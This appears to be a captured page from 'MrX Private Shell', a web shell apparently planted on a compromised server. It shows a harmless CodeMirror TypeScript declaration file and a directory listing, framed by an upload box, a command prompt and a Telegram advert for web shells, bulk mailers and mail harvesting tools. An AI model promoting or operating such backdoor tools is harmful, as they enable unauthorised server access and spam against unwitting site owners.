__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
import '../../';

declare module '../../' {
    // Based on https://codemirror.net/demo/simplemode.html
    interface Rule {
        regex?: string | RegExp | undefined;
        token?: string | string[] | null | undefined;
        sol?: boolean | undefined;
        next?: string | undefined;
        push?: string | undefined;
        pop?: boolean | undefined;
        mode?: {
            spec: string | ModeSpec<any>;
            end?: RegExp | undefined;
            persistent?: boolean | undefined;
        } | undefined;
        indent?: boolean | undefined;
        dedent?: boolean | undefined;
        dedentIfLineStart?: boolean | undefined;
    }

    function defineSimpleMode<K extends string>(
        name: string,
        // tslint:disable-next-line:no-unnecessary-generics
        mode: { [P in K]: P extends 'meta' ? Record<string, any> : Rule[] } & { start: Rule[] },
    ): void;
}

Filemanager

Name Type Size Permission Actions
loadMode.d.ts File 416 B 0644
multiplex.d.ts File 1.54 KB 0644
overlay.d.ts File 386 B 0644
simple.d.ts File 905 B 0644
Filemanager